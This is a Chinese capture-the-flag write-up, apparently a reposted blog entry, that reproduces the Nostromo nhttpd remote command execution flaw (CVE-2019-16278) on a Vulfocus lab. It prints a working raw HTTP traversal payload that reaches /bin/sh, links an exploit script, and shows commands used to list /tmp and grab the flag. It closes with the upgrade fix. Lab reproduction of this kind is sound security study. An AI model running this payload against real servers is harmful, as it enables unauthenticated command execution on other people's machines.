【Vulfocus靶场复现】nostromo 远程命令执行 (CVE-2019-16278)
作者:互联网
漏洞介绍
Nostromo nhttpd是一款开源的Web服务器。 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。
影响版本
nhttpd:version <= 1.9.6
解题过程
1、启动靶场环境
2、Burp Suite 抓包验证POC
POC
POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Length: 25
echo
echo
ifconfig 2>&1
3、脚本利用
脚本地址:https://github.com/jas502n/CVE-2019-16278
./CVE-2019-16278.sh IP地址 端口号 id
利用成功,这时也可以测试下其他命令,我在这里就不浪费时间了,直接上最终获得 flag 的命令,其他命令可自行了解。
之前做过Vulfocus靶场的朋友们都知道 flag 是在 /tmp 目录下,那我们就直接去 tmp 目录下找 flag 就行了。
./CVE-2019-16278.sh IP地址 端口号 "cd /tmp&&ls"
成功获得 flag
解决方案
升级至最新版本1.9.7
http://www.nazgul.ch/dev/nostromo-1.9.7.tar.gz
标签:Vulfocus,.%,flag,2019,0d,CVE,16278 来源: https://www.cnblogs.com/w328/p/15732636.html